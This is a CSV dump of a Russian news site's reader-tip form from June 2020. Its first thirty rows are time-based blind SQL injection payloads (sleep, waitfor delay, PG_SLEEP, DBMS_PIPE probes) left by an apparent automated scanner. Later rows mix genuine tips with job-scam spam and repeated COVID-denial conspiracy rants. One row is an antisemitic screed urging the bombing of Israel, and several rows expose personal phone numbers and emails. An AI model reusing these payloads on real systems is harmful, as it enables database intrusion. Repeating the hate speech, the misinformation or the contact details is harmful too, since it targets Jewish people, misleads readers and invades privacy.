400,TzwSVsOw,"555-666-0606",sample@email.tst,Mr.,"0'XOR(if(now()=sysdate(),sleep(12),0))XOR'Z","1","2020-06-09 14:04:50",0,"1",599564575
401,TzwSVsOw,"555-666-0606",sample@email.tst,Mr.,"0""XOR(if(now()=sysdate(),sleep(12),0))XOR""Z","1","2020-06-09 14:04:54",0,"1",599564575
402,TzwSVsOw,"555-666-0606",sample@email.tst,Mr.,"(select(0)from(select(sleep(12)))v)/*'+(select(0)from(select(sleep(12)))v)+'""+(select(0)from(select(sleep(12)))v)+""*/","1","2020-06-09 14:04:57",0,"1",599564575
403,TzwSVsOw,"555-666-0606",sample@email.tst,Mr.,-1; waitfor delay '0:0:12' -- ,"1","2020-06-09 14:05:01",0,"1",599564575
404,TzwSVsOw,"555-666-0606",sample@email.tst,Mr.,-1); waitfor delay '0:0:12' -- ,"1","2020-06-09 14:05:06",0,"1",599564575
405,TzwSVsOw,"555-666-0606",sample@email.tst,Mr.,"1 waitfor delay '0:0:12' -- ","1","2020-06-09 14:05:10",0,"1",599564575
406,TzwSVsOw,"555-666-0606",sample@email.tst,Mr.,"4MYL78O8'; waitfor delay '0:0:12' -- ","1","2020-06-09 14:05:13",0,"1",599564575
407,TzwSVsOw,"555-666-0606",sample@email.tst,Mr.,-5 OR 803=(SELECT 803 FROM PG_SLEEP(12))--,"1","2020-06-09 14:05:17",0,"1",599564575
408,TzwSVsOw,"555-666-0606",sample@email.tst,Mr.,-5) OR 475=(SELECT 475 FROM PG_SLEEP(12))--,"1","2020-06-09 14:05:21",0,"1",599564575
409,TzwSVsOw,"555-666-0606",sample@email.tst,Mr.,-1)) OR 863=(SELECT 863 FROM PG_SLEEP(12))--,"1","2020-06-09 14:05:24",0,"1",599564575
410,TzwSVsOw,"555-666-0606",sample@email.tst,Mr.,qXkbjiib' OR 826=(SELECT 826 FROM PG_SLEEP(12))--,"1","2020-06-09 14:05:28",0,"1",599564575
411,TzwSVsOw,"555-666-0606",sample@email.tst,Mr.,cAp7KhaK') OR 200=(SELECT 200 FROM PG_SLEEP(12))--,"1","2020-06-09 14:05:33",0,"1",599564575
412,TzwSVsOw,"555-666-0606",sample@email.tst,Mr.,Nht9YhDZ')) OR 717=(SELECT 717 FROM PG_SLEEP(12))--,"1","2020-06-09 14:05:37",0,"1",599564575
413,TzwSVsOw,"555-666-0606",sample@email.tst,Mr.,"555*DBMS_PIPE.RECEIVE_MESSAGE(CHR(99)||CHR(99)||CHR(99),12)","1","2020-06-09 14:05:39",0,"1",599564575
414,TzwSVsOw,"555-666-0606",sample@email.tst,Mr.,"555'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),12)||'","1","2020-06-09 14:05:42",0,"1",599564575
415,TzwSVsOw,"555-666-0606",sample@email.tst,Mr.,"555","1","2020-06-09 14:05:45",0,"1",599564575
416,TzwSVsOw,"555-666-0606",sample@email.tst,Mr.,"555","1","2020-06-09 14:05:48",0,"1",599564575
417,TzwSVsOw,"555-666-0606",sample@email.tst,-1 OR 2+44-44-1=0+0+0+1 -- ,"555","1","2020-06-09 14:05:48",0,"1",599564575
418,TzwSVsOw,"555-666-0606",sample@email.tst,-1 OR 2+139-139-1=0+0+0+1,"555","1","2020-06-09 14:05:48",0,"1",599564575
419,TzwSVsOw,"555-666-0606",sample@email.tst,-1' OR 2+887-887-1=0+0+0+1 -- ,"555","1","2020-06-09 14:05:49",0,"1",599564575
420,TzwSVsOw,"555-666-0606",sample@email.tst,-1' OR 2+456-456-1=0+0+0+1 or 'ycMb8Fcb'=',"555","1","2020-06-09 14:05:49",0,"1",599564575
421,TzwSVsOw,"555-666-0606",sample@email.tst,"-1"" OR 2+477-477-1=0+0+0+1 -- ","555","1","2020-06-09 14:05:49",0,"1",599564575
422,TzwSVsOw,"555-666-0606",sample@email.tst,"93'","555","1","2020-06-09 14:05:50",0,"1",599564575
423,TzwSVsOw,"555-666-0606",sample@email.tst,"if(now()=sysdate(),sleep(12),0)","555","1","2020-06-09 14:05:52",0,"1",599564575
424,TzwSVsOw,"555-666-0606",sample@email.tst,"0'XOR(if(now()=sysdate(),sleep(12),0))XOR'Z","555","1","2020-06-09 14:05:55",0,"1",599564575
425,TzwSVsOw,"555-666-0606",sample@email.tst,"0""XOR(if(now()=sysdate(),sleep(12),0))XOR""Z","555","1","2020-06-09 14:05:59",0,"1",599564575
426,TzwSVsOw,"555-666-0606",sample@email.tst,"(select(0)from(select(sleep(12)))v)/*'+(select(0)from(select(sleep(12)))v)+'""+(select(0)from(select(sleep(12)))v)+""*/","555","1","2020-06-09 14:06:04",0,"1",599564575
427,TzwSVsOw,"555-666-0606",sample@email.tst,"1 waitfor delay '0:0:12' -- ","555","1","2020-06-09 14:06:08",0,"1",599564575
428,TzwSVsOw,"555-666-0606",sample@email.tst,f2qziJwQ'; waitfor delay '0:0:12' -- ,"555","1","2020-06-09 14:06:11",0,"1",599564575
429,TzwSVsOw,"555-666-0606",sample@email.tst,p6TkmWvP' OR 349=(SELECT 349 FROM PG_SLEEP(12))--,"555","1","2020-06-09 14:06:15",0,"1",599564575
430,"","","","",https://chelny-biz.ru/news/336290/,"","2020-06-09 15:32:45",0,f4f9575a6178970c9b6b9ded462cf063,1536204519
431,"","","",Махинации с подсчетом активных случаев короновируса,"Добрый день!
На сайте стопкороновирус по информации на 09.06.2020 указывается, что в РТ 92 активных случая с короновирусной инфекцией (скрин приложен), однако по информации челнинских медицинских служб https://chelny-biz.ru/news/336396/ указывается ""На лечении остаются 906 человек"". Эта цифра более достоверная, учитывая комментарии в соцсетях о переполненности больниц.

Прикрытие ""неудобной"" информации, фальсификация статистики фактически приводит к потерям человеческих жизней. Лично у меня  за последние два месяца умерло три человека знакомых со всеми симптомами короновируса, причем в их семьях другие члены семьи переболели двухсторонней пневмонией. Вы раньше слышали о том, чтобы пневмония была заразным заболеванием? Чтобы два человека из одной семьи заболели бывало только тогда, когда оба под лед провалились, а сейчас это происходит в мае месяце безо всяких обычных факторов. И если у меня умерло 3 человека знакомых, то не может же быть, чтобы на весь Татарстан было 10 погибших?

Проведите, пожалуйста, независимое расследование. Население Татарстана будет вам очень признательно. ",f4f9575a6178970c9b6b9ded462cf063,"2020-06-09 16:25:17",0,f4f9575a6178970c9b6b9ded462cf063,1536204519
432,Елена,"","",Коллапс в лаборатории гор. бол 7,"Здравствуйте! В лаборатории гкб 7 казани коллапс. Из за неоплаты системы автоматизации мы были отключены!! Раньше мы кое как успевали обрабатывать 10 тыщ анализов в день с учетом наличия системы так сейчас мы просто и 20% не успеваем за это время обработать. Стоит 11 поликлиник, скоро будет социальный взрыв. Нам  руководители говорят что все хорошо. 

руководство купило другую систему а сделать с ней ничего не могут. торги провели без конкурса, потратили 58 миллионов а стало еще хуже. 

Видимо потому что новая фирма друзья министра со времен когда он тут работал. ","","2020-06-10 11:01:17",0,ac79366cc8fbe1b77b6ad599d376375f,861078492
433,"","","","","Был долгий поиск работы. Выход нашелся на этом вебинаре. Работа за компьютером пару часов в день. Учат бесплатно. Проработал уже 2 месяца. Примерно, 30-50К в месяц получается. Работа не сложная, мне нравится, 2 часа в день. Кому интересно, пишите мне на почту:pimanskij103@gmail.com
","","2020-06-10 19:53:21",0,"734687d050624214d0e49ba07e51c929",628661098
434,Тимур,"","",Взрыв на северо-западном улице,Фото вспышки.,e3e812927acadeeced1e57697657cc46,"2020-06-12 22:49:46",0,e3e812927acadeeced1e57697657cc46,2999732839
435,Тимур,"","",В Казани на улице Северо-Западная взорвалась цистерна с газом. ,Фото взрыва. Вид из Салават Купере:,e3e812927acadeeced1e57697657cc46,"2020-06-12 23:05:50",0,e3e812927acadeeced1e57697657cc46,2999732839
436,Тимур,"","",Взрыв на северо-западной улице,Фото пожара на Северо Западной. Вид с ЖК Салават Купере.,e3e812927acadeeced1e57697657cc46,"2020-06-12 23:10:31",0,e3e812927acadeeced1e57697657cc46,2999732839
437,"","","","",https://www.youtube.com/watch?v=dHeYjOdz5OM&feature=emb_logo,"","2020-06-14 10:38:36",0,"8aedd635780b928eb776c8ae1778be95",1467334092
438,"","","","",https://www.google.com/amp/s/takiedela.ru/news/2020/06/11/liliya-khoruzhenko/amp/,"","2020-06-14 11:02:13",0,"178495e1d279bb2b11f2c6d71bb54859",1410496949
439,Roman,"","26safin@gmail.com",крупнейший региональный игрок в сфере доставки готовых рационов правильного питания Bon Ration планирует включить Level Kitchen и My Food в свой маркетплейс.,"Как стало известно,со слов генерального директора Bon Ration Резеды Салаховой,  крупнейший региональный игрок в сфере доставки готовых рационов правильного питания Bon Ration планирует включить Level Kitchen и My Food в свой маркетплейс.

Напоминаем, ранее Бизнес-онлайн сообщил, что Level Kitchen и My Food - сервисы по производству готовой еды, входящие в холдинг Performance Group, планируют открыться в Казани до конца лета.

Таким образом, Bon Ration закрепят лидерскую позицию в доставке полезных рационов еды, как крупнейший региональный Маркетплейс. Он включает в себя приложение для клиентов и отдельную CRM-систему для доставщиков с полной автоматизацией оформления заказов и доставки в 3 клика. 


* Bon Ration - казанский стартап, резидент Бизнес-инкубатора ИТ-парка. Cервис объединил в себе компании по доставке правильной еды в мобильном приложении. География проекта: Казань, Калининград, Уфа, Краснодар, Екатеринбург, Ульяновск, Москва, Санкт-Петербург.
","","2020-06-15 13:56:45",0,"8fe8ead12393203a2ac73dc3288366f9",520978724
440,Сегодня хороший день для www.yandex.ru,Сегодня хороший день для www.yandex.ru,svyatoslav.voron@bk.ru,Сегодня хороший день для www.yandex.ru,Сегодня хороший день для www.yandex.ru,"","2020-06-15 19:05:30",0,b3e197ea8946ff269566b85f8d153492,1593506131
441,"","","","","
Инфографика: Евгений Еникеев, Анна Жаворонкова / «Новая»

В абсолютных числах оштрафованных лидируют республика Татарстан и Краснодарский край, где административные наказания получили 33 943 и 16 604 человек соответственно.
https://novayagazeta.ru/articles/2020/06/09/85761-avtomaticheskie-narushiteli","","2020-06-16 12:26:04",0,"8aedd635780b928eb776c8ae1778be95",1467334063
442,www.google.com,"",labaka1102@gmail.com,Subject,hi www.yandex.ru,"","2020-06-16 12:40:04",0,a4c80730bf9ab1460708c0520fd3bf25,1595708425
443,"","","","","Смертельная авария на М-5 в Челябинской области, где грузовик протаранил пять машин, попала на видео https://74.ru/text/incidents/69317950/","","2020-06-16 18:35:20",0,"8aedd635780b928eb776c8ae1778be95",1467334022
444,Айрат,+7 (987) 420-4-333,ayrat.mullakhmetov@yandex.ru,KASSIR.RU не возвращает денежные средства за билеты,"Добрый день!

Хотелось бы рассказать Вам о массовой ситуации, связанной с невозможность вернуть денежные средства за билеты, купленные через билетного оператора ООО ""КАССИР.РУ Поволжье"". Об этом свидетельствует не только мой личный опыт, когда вот уже 89 дней с момента написания заявления на возврат я не могу получить назад свои деньги, но и большое количество аналогичных отзывов в социальных сетях и на сайте 2GIS.

Кратко о моей ситуации: 21.03.2020 мною было составлено и передано сотруднице компании Кассир.ру Кузнецовой И.В. в концертной кассе по адресу г. Казань, проспект Ямашева, 71а заявление на возврат денежных средств в размере 2700 рублей за приобретенные ранее билеты на концерт ""Элджей"" по причине переноса даты мероприятия организатором. Согласно информации, указанной на сайте Kassir.ru по состоянию на 21.03.2020, срок возврата денежных средств составлял 10 дней с момента получения заявления о возврате.

Прошло почти 90 дней, но нет ни денег, ни обратной связи от компании. И это больше становится похоже на то, что я отдал деньги мошеннической организации, офис которой закрыт под предлогом пандемии, а некомпетентные сотрудники колл-центра только и могут обещать разобраться в ситуации ""в ближайшее время"".

Насколько я понимаю, компания Кассир.ру специально закрыла все свои офисы и кассы в Казани и не принимает клиентов, чтобы дождаться вступления постановления Правительства РФ от 06 июня 2020 года №830, согласно которому при переносе мероприятия клиент не получит денег, а только ваучер на сумму приобретенного билета.
Кроме того, закрыта возможность оставить комментарий в соцсетях (VK и Instagram), а неоднократно оставленные на почте претензии о возврате остаются без ответа. В течение трех месяцев постоянных звонков на горячую линию компании, нам так и не был предоставлен ответ, когда будет осуществлен возврат денежных средств, сотрудники лишь кормят постоянно завтраками и фразами по скриптам ""Мы также стали заложниками ситуации с коронавирусом, наберитесь терпения, возврат будет осуществлен в ближайшее время"".

В связи с этим, прошу Вас обратить внимание на сложившуюся ситуацию и, если данный материал будет интересным для освещения в газете Бизнес-Онлайн, опубликовать статью на эту тему. Надеюсь, тем самым Вы поможете сотням таких же людей, пострадавших от действий компании Кассир.ру, повлиять на ситуацию и быстрее вернуть свои деньги и отговорить других людей от услуг данного билетного оператора.",d0a4352cc47ece62b23e02c6ca10317c,"2020-06-17 10:20:34",0,d0a4352cc47ece62b23e02c6ca10317c,1467332941
445,"","","",Короновирус в Набережных Челнах. ,"Статья лажа чистой воды! Заказная, в угоду отвратительного бизнеса, который зарабатывает на вирусе. Пора и пришло время избавляться от другого вируса: бизнес - вируса, и продажного СМИ заражённых вирусом от денег. ","","2020-06-18 16:44:06",0,cc4a53560e2861cf14af5c25d1da889a,1533763839
446,"","","","",привет,"","2020-06-20 08:31:43",0,bc201cf6cebe14854504036e992fa294,2956673759
447,rrrrrrr,"111111111111111111",ewrewrw@mail.com,"","Как получить гражданство Израиля? - разбомбить его нафиг. Нет Израиля – гражданство ни к чему. Так заходи.
-----------------------
ПАНДЕМИЯ.
1. ПАНДЕМИ́Я (греч. Πανδημία) — весь НАРОД.
Талмуд: «Евреи ЧЕЛОВЕЧЕСКИЕ существа, остальные не ЛЮДИ».
2. Эпидемия, характеризующаяся распространением ЧЕЛОВЕЧЕСКОЙ инфекции на территории всего мира. 
ЧЕЛОВЕК ЧЕЛОВЕКУ друг товарищ и брат. 
Вирус, 
1. https://gazetaingush.ru/sites/default/files/news/20180525-minnac-ingushetii-obyavil-o-starte-konkursa-socialnoy-reklamy-napravlennoy-na-ukreplenie/joined-hands-global-family-day.jpg
2. https://i.etsystatic.com/5726108/r/il/3d51d8/234576378/il_794xN.234576378.jpg 
Коронавирус!
3.https://yandex.ru/images/search?text=%D0%94%D1%80%D1%83%D0%B6%D0%B1%D0%B0%20%D0%BD%D0%B0%D1%80%D0%BE%D0%B4%D0%BE%D0%B2
Вижу с, 
https://action-news.eu/wp-content/uploads/2019/07/640_267111.jpeg 
слышу с, 
http://i.mycdn.me/i?r=AzEPZsRbOZEKgBhR0XGMT1RkISVL9gHuyBQUgcTPDE_oZaaKTM5SRkZCeTgDn6uOyic  
вижу с. 
https://infenshui.ru/images/predskazaniya/20_858764788465.jpg 
Сама такая. https://iatkv.tmgrup.com.tr/2be716/637/242/0/40/553/251?u=https%3A%2F%2Fitkv.tmgrup.com.tr%2Falbum%2F2020%2F02%2F11%2Fturkiye-kehaneti-kan-dondurdu-ust-uste-gelen-depremler-sonrasi-iste-2020-yili-baba-vanga-kehanetleri-1581435937427.jpg 
Дружба дружбой, а денежки врозь. 
https://yandex.ru/images/search?text=%D0%B2%D0%B0%D0%BB%D1%8E%D1%82%D0%B0%20%D0%B2%D1%81%D0%B5%D1%85%20%D1%81%D1%82%D1%80%D0%B0%D0%BD%20%D0%BC%D0%B8%D1%80%D0%B0  
Жидовалюты всех стран, объединяйтесь в Крипты!
https://yandex.ru/images/search?text=%D0%BA%D1%80%D0%B8%D0%BF%D1%82%D0%BE%D0%B2%D0%B0%D0%BB%D1%8E%D1%82%D0%B0 
«Почему почти все народы изгоняли евреев со своих территорий?» - потому что «народы» криптоевреи. Подличают воюют. Показательные выступления, обман. Один из способов скрыть собственное еврейское происхождение.
Также проводятся погромы. Крипты собирают несведущих неевреев, а затем на месте погрома убивают их вместе с евреями.
«История» еврейское слово, также как и все остальные слова во всех языках. Означает «ложь», истории преимущественно негативного характера. Языки крипто-еврейские. Не поймут – не обманешь.
Трудно подсчитать, сколько поколений можно сказать, что не жило и неживёт из-за каких-то подонков. Да ещё и дебилов, дегенератов.
Технику покрали, комментарий не оставишь.
","","2020-06-21 13:59:40",0,fc65fd826439a6ba789f64b6308dbc2b,1845232952
448,Деметр,"","",Баннер на Горьковском шоссе,В направлении озера Лебяжье,null,"2020-06-22 17:02:28",0,"454475618850f0dfb5ef6aecf84b6b65",3169461283
449,Евгений,"9179000038",kukued@mail.ru,Давно пора,"""В условиях всеобщей расхлябанности авантюристы от науки решили бросить «дохлую кошку» в мир науки, пока вокруг не разобрались, что к чему. Академия стала машиной для имитации научных исследований.""....  Видимо у руководства республики просто пока ""руки не дошли""до серьёзного рассмотрения этой темы, экономика отвлекает основные силы и ресурсы... Однако, видимо уже пора серьёзно заняться этой проблемой?!!!","","2020-06-23 06:44:39",0,ace10bbce3c31836622ad491a88bf20a,2999737609
450,Тариель Талыбян,+994503167877,ttariyel@box.az,business-gazeta.ru/article/464732," Очередной мировой суперКризис(вторая ""великая депрессия""?) + КоронаШухер(приостановка экономики) + Падение цен на нефть = ???  

Этот ""коронавирус"" -- разновидность (""штамм"") вируса сезонного гриппа (просто -- ""коронованный"" , типа ""могущественный и очень опасный"", для устрашения ""тупого быдла"", чтоб лучше подчинялся, но который однако мало поверил ,в 2001-м, в ""страшных террористов-демонов"",жаждущих  ""всех взорвать и испепелить"", но почему-то  совсем не трогающих  ""главных подлецов-кяфиров"" -- западную ""элиту"" и их собственность,ни ""частную"",ни ""общаково-государственную"").  

Весь этот ""коронаШухер"" ( с ""закулисными слухами"" про ""скрываемую вспышку чумы"" и т.п.) организован  ""однополярнУтыми мировыми паханами"" (которым ""демократическая"" показуха  видимо больше не нужна, особенно на пороге  финансового суперКризиса  с  очередным РЫВКОМ [и даже возможно качественным ""прорывом""]   в  свяшэнном деле _""концентрации мирового капитала""),_  и распространяется *лживыми попугаями-пижонами* (рисующимися ради банального ""центра внимания"" и/или ""косточки"").  У многих даже  ""паника""  это просто беспринципно-подражательные СОСТЯЗАТЕЛЬНЫЕ ПОНТЫ.  (Не будем путать  реальный страх[вируса] -- с [доминантным] лицедейством. Весь Мир -- как большой ""Театр пройдох"",  *где _лживые попугаи_  толпой заклёвывают и затыкают ""белых ворон"").*    

А чего вы ожидали-то  от этого ""эгоистичного Мира подленькой борьбы лживых попугаев"" (где даже  *стандартная*  религия и мораль -- тоже  бесстыже-подражательный обман и подлость , т.е. стандартный ОБМАННЫЙ ПРИЁМ [или просто как банальное ""условно-рефлекторное усиление"" страхов]  в борьбе за ""ситуативное наиприятное"",за превосходство в ""возможностях для удовольствий"", за банальный ""центр внимания"" и более жирную ""косточку"",за ""превосходящее счастье"",   даже среди ""обмануто-стеснительных честных фраеров"",  и даже среди тех  кто ""красиво-уверенно играет и подыгрывает как невникающий попугай"")?!? 



 ... Не будем особо надеяться (даже просто делать такой вид, из состязательно-лицедейского ""патриотизма"") на  обречённо-вечного _вассала ""бензо-колонии"",_ на вынужденного _""сутенёра матери-Родины""_ (опущенной в конце 80-х; кстати,под ""счастливыми"" насмешками _не менее продажного_ быдла, вечно недовольного ""более богатыми эгоистами"").  Он просто ""фигура в игре"", .. и быть как ""западные вассалы евросоюза""  и меньше чмырить своё быдло -- тоже нЕ от него зависит.  (Восток не входит в глобалистские представления о ""золотом миллиарде"". А у советских ядерных боеголовок,припрятанных ""кремлёвскими поцонами""  при ""рейгановском шмоне""  и ""распродаже Родины по-дешёвке"" -- истёк 15летний срок годности  уже при пьяном ельцине!).
  ","","2020-06-23 14:20:52",0,d7ee2a9895ca2ee0aaab8d7aeb867687,96417791
451,Михаил,"",mtikhonov@gmail.com,Будет ли интересна такая тема?,"Добрый день!

 Может ли быть интересна такая тема? Строители, при строительстве объекта засыпали пешеходную калитку в СНТ, теперь люди ходят по очень опасному склону. Так же был нарушен водоотвод и СНТ подтапливает.
 Товарищество находится в городе Казани.","","2020-06-23 16:45:16",0,"13aeb143ccf00edfdd2c3d1c1b2d0f8d",2999731240
452,Пётр,"8903873-30-70",petro785@mail.ru,"","Правительство и Путин посадили пенсионеров на нищенские пенсии, из 12 тысяч руб которых 8 тыс забирает коммуналка ЖКХ, и он еще говорит о повышении благосостояния граждан России. Ельцин обещал достойные пенсии как на западе. Путин обещал каждый раз согласно конституции заботу о гражданах, на деле нищета. Всё банки разворовывают. Теперь конституция изменения!? А какие изменения, если народ в 1993 году голосовали все против ельцинской конституции! Тогда как можно менять то чего нет. То что правительство её пропихнуло, это не значит что народ её принял одобрил. А теперь право-преемственность РФ от  СССР. Хитро задумано!!! хаха. Голосуешь против признаешь старый вариант 1993 года. Голосуешь за - признаешь её же с изменениями!!! Её нет, по этому либо заново писать! Либо она не легитимна  при любом голосовании! Подстроенную на лжи и обмане конституцию, народ никогда не примет её. В физике есть понятия начальные и граничные условия для любой задачи. Изначальная ложь порождает цепочку последующей лжи и пока не покончим с этим так и будем писать лживые конституции признаваемую тем кто её писал, и с отторжением её народом России! Ложь господа! Изначально дает те же плоды!","","2020-06-23 19:39:46",0,"0813d0cbabde7cd6fd397df8f4b92924",1845262435
453,"","","",по поводу отмены масочно перчаточного режима для отдельной категории граждан ,"прошу Вас помочь довести эту информацию до руководства  Рособрнадзора - написать им возможности нет - тема - отсутствие средств защиты у сдающих ЭГЭ  во время экзамена - предложения - Прошу довести моё письмо до И.О. руководителя Рособрнадзора - на их сайте я не нашел возможности послать им сообщения - только в регионы - но регионы таких полномочий не имеют - в опубликованных правилах ЕГЭ 2020 года содержится запрет ношения масок -сдающие ЕГЭ дети подвергают себя опасности заразиться коронавирусом - потому что полтора метра - вместо двух и возможность регулярно менять маски - в это время видео камеры могут зафиксировать лица сдающих ЕГЭ - в данном случае руководитель ведомства ссылается на решение РОСЗДРАВНАДЗОРА - а Росздравнадзор на требование РОСОБРНАДЗОРА о необходимости видеть лица учащихся для идентификации , выходом было бы разрешение использовать вместо масок прозрачные защитные щитки - которые защищают нос и рот - как у Врачей - и не мешают дышать при этом - но в правилах проведения ЕГЭ они не перечислены - прошу Вас срочно изыскать возможность внести щитки для замены масок и рекомендовать региональным комиссиям по проведению испытать эти средства защиты на прозрачность и при необходимости настроить видео камеры или поставить столы так что бы не было бликов - если это невозможно - то организовать снятие щитков - предварительно поставив на стол каждого участника алкогель для обработки рук - что бы камеры успели зафиксировать лица участников - они будут защищены - а видео камеры будут фиксировать их столько раз - сколько вы решите в итоге что бы участники снимали щитки на полминуты - минуту - думаю что вопрос решаемый - просто постарайтесь успеть это сделать пока идут последние 10 дней до начала ЕГЭ. И последнее - стоит раздвинуть столы на 2 метра - для этого удвоить количество дней для экзамена - здоровье дороже - чем желание успеть к дате 14 августа - вузы поймут и отодвинут установочные сессии - в противном случае нужно рассмотреть вопрос в комиссии по этике . С пожеланием успеть внести необходимые изменения .","","2020-06-23 22:40:39",0,fe7d058e45a2e55f3bbbcb5747b22c53,2956199575
454,Виталий,"9166911172",support@webjob.host,Аналог кворк,"Здравствуйте.Хороший аналог биржи кворк https://webjob.host/ ,только без комиссий на вывод заработанных средств.","","2020-06-24 08:16:34",0,dcce01923d3a0fd84b913ed8f3faeca0,1571485463
455,Тариель Талыбян,+994503167877,ttariyel@box.az,business-gazeta.ru/article/465545,"Очередной мировой суперКризис(вторая ""великая депрессия""?) + КоронаШухер(приостановка экономики) + Падение цен на нефть = ???  

Этот ""коронавирус"" -- разновидность (""штамм"") вируса сезонного гриппа (просто -- ""коронованный"" , типа ""могущественный и очень опасный"", для устрашения ""тупого быдла"", чтоб лучше подчинялся, но который однако мало поверил ,в 2001-м, в ""страшных террористов-демонов"",жаждущих  ""всех взорвать и испепелить"", но почему-то  совсем не трогающих  ""главных подлецов-кяфиров"" -- западную ""элиту"" и их собственность,ни ""частную"",ни ""общаково-государственную"").  

Весь этот ""коронаШухер"" ( с ""закулисными слухами"" про ""скрываемую вспышку чумы"" и т.п.) организован  ""однополярнУтыми мировыми паханами"" (которым ""демократическая"" показуха  видимо больше не нужна, особенно на пороге  финансового суперКризиса  с  очередным РЫВКОМ [и даже возможно качественным ""прорывом""]   в  свяшэнном деле _""концентрации мирового капитала""),_  и распространяется *лживыми попугаями-пижонами* (рисующимися ради банального ""центра внимания"" и/или ""косточки"").  У многих даже  ""паника""  это просто беспринципно-подражательные СОСТЯЗАТЕЛЬНЫЕ ПОНТЫ.  (Не будем путать  реальный страх[вируса] -- с [доминантным] лицедейством. Весь Мир -- как большой ""Театр пройдох"",  *где _лживые попугаи_  толпой заклёвывают и затыкают ""белых ворон"").*    

А чего вы ожидали-то  от этого ""эгоистичного Мира подленькой борьбы лживых попугаев"" (где даже  *стандартная*  религия и мораль -- тоже  бесстыже-подражательный обман и подлость , т.е. стандартный ОБМАННЫЙ ПРИЁМ [или просто как банальное ""условно-рефлекторное усиление"" страхов]  в борьбе за ""ситуативное наиприятное"",за превосходство в ""возможностях для удовольствий"", за банальный ""центр внимания"" и более жирную ""косточку"",за ""превосходящее счастье"",   даже среди ""обмануто-стеснительных честных фраеров"",  и даже среди тех  кто ""красиво-уверенно играет и подыгрывает как невникающий попугай"")?!? 

У однополярнутых глобалистов (""мировых паханов"") нет конкурентов, поэтому им  больше нЕ  нужно это ""ускоренное РАЗВИТИЕ ОБЩЕСТВА""  и ""уважительно-демократическое""  управление рабами. Больше уже незачем отказываться от ""блаженства диктатурной власти"". 
) А вообще, ""быдлу"" (как их  заглаза  называют ""управляющие элиты"") всё равно, ктО  их обожравшийся ""рабовладелец""! Чем меньше ""пастухов общества"", тем лучше (для ""быдла"")! Легче терпеть   их высокомерие и понты ""превосходства"" (в этой неизбежной ""Пирамиде Неравенства Возможностей""). Да и СТЕПЕНЬ диктатурной ЭКСПЛУАТАЦИИ при этом меньше (как бы ни пугали нас  свои пастухи   ""страшным Западом""  и ""страшными Глобалистами""). 

 ... Не будем особо надеяться (даже просто делать вид, из состязательно-лицедейского ""патриотизма"")  и ""уповать""  на  обречённо-вечного _вассала ""бензо-колонии"",_ на вынужденного _""сутенёра матери-Родины""_ (опущенной в конце 80-х; кстати,под ""счастливыми"" насмешками _не менее продажного_ быдла, вечно недовольного ""более богатыми эгоистами"").  Он просто ""фигура в игре"", .. и быть как ""западные вассалы евросоюза""  и меньше чмырить своё быдло -- тоже нЕ от него зависит.  (Видимо, Восток не входит в глобалистские представления о ""золотом миллиарде"". А у советских ядерных боеголовок,припрятанных ""кремлёвскими поцонами""  при ""рейгановском шмоне""  и ""распродаже Родины по-дешёвке"" -- истёк 15летний срок годности  уже при пьяном ельцине!).  

... Будьте востребованным специалистом (хотя бы  ""интеллигентом-жоп@лизом""  или  ""писателем морально-религиозной лапши для быдла"") и тогда вы выйдите из ниши  ""нерентабельных рабов"" (которых ""нужно культурно уничтожить"").  ... Борьбу за ""более приятное существование"" и  естественный ""отсев слабаков""  бог ещё не отменял.  .. Бог не ""фраер"", он такой же ""эгоист"" как и все вы  (""батраки Эволюции"" и ""лживые попугаи Общества""  чмырящие и едящие более слабого),   просто возможностей больше.  
","","2020-06-24 13:31:35",0,d7ee2a9895ca2ee0aaab8d7aeb867687,96407944
456,Тариель Талыбян,+994503167877,ttariyel@box.az,business-gazeta.ru/news/464256,"Очередной мировой суперКризис(вторая ""великая депрессия""?) + КоронаШухер(приостановка экономики) + Падение цен на нефть = ???  

Этот ""коронавирус"" -- разновидность (""штамм"") вируса сезонного гриппа (просто -- ""коронованный"" , типа ""могущественный и очень опасный"", для устрашения ""тупого быдла"", чтоб лучше подчинялся, но который однако мало поверил ,в 2001-м, в ""страшных террористов-демонов"",жаждущих  ""всех взорвать и испепелить"", но почему-то  совсем не трогающих  ""главных подлецов-кяфиров"" -- западную ""элиту"" и их собственность,ни ""частную"",ни ""общаково-государственную"").  

Весь этот ""коронаШухер"" ( с ""закулисными слухами"" про ""скрываемую вспышку чумы"" и т.п.) организован  ""однополярнУтыми мировыми паханами"" (которым ""демократическая"" показуха  видимо больше не нужна, особенно на пороге  финансового суперКризиса  с  очередным РЫВКОМ [и даже возможно качественным ""прорывом""]   в  свяшэнном деле _""концентрации мирового капитала""),_  и распространяется *лживыми попугаями-пижонами* (рисующимися ради банального ""центра внимания"" и/или ""косточки"").  У многих даже  ""паника""  это просто беспринципно-подражательные СОСТЯЗАТЕЛЬНЫЕ ПОНТЫ.  (Не будем путать  реальный страх[вируса] -- с [доминантным] лицедейством. Весь Мир -- как большой ""Театр пройдох"",  *где _лживые попугаи_  толпой заклёвывают и затыкают ""белых ворон"").*    

А чего вы ожидали-то  от этого ""эгоистичного Мира подленькой борьбы лживых попугаев"" (где даже  *стандартная*  религия и мораль -- тоже  бесстыже-подражательный обман и подлость , т.е. стандартный ОБМАННЫЙ ПРИЁМ [или просто как банальное ""условно-рефлекторное усиление"" страхов]  в борьбе за ""ситуативное наиприятное"",за превосходство в ""возможностях для удовольствий"", за банальный ""центр внимания"" и более жирную ""косточку"",за ""превосходящее счастье"",   даже среди ""обмануто-стеснительных честных фраеров"",  и даже среди тех  кто ""красиво-уверенно играет и подыгрывает как невникающий попугай"")?!? 

У однополярнутых глобалистов (""мировых паханов"") нет конкурентов, поэтому им  больше нЕ  нужно это ""ускоренное РАЗВИТИЕ ОБЩЕСТВА""  и ""уважительно-демократическое""  управление рабами. Больше уже незачем отказываться от ""блаженства диктатурной власти"". 
) А вообще, ""быдлу"" (как их  заглаза  называют ""управляющие элиты"") всё равно, ктО  их обожравшийся ""рабовладелец""! Чем меньше ""пастухов общества"", тем лучше (для ""быдла"")! Легче терпеть   их высокомерие и понты ""превосходства"" (в этой неизбежной ""Пирамиде Неравенства Возможностей""). Да и СТЕПЕНЬ диктатурной ЭКСПЛУАТАЦИИ при этом меньше (как бы ни пугали нас  свои пастухи   ""страшным Западом""  и ""страшными Глобалистами""). 

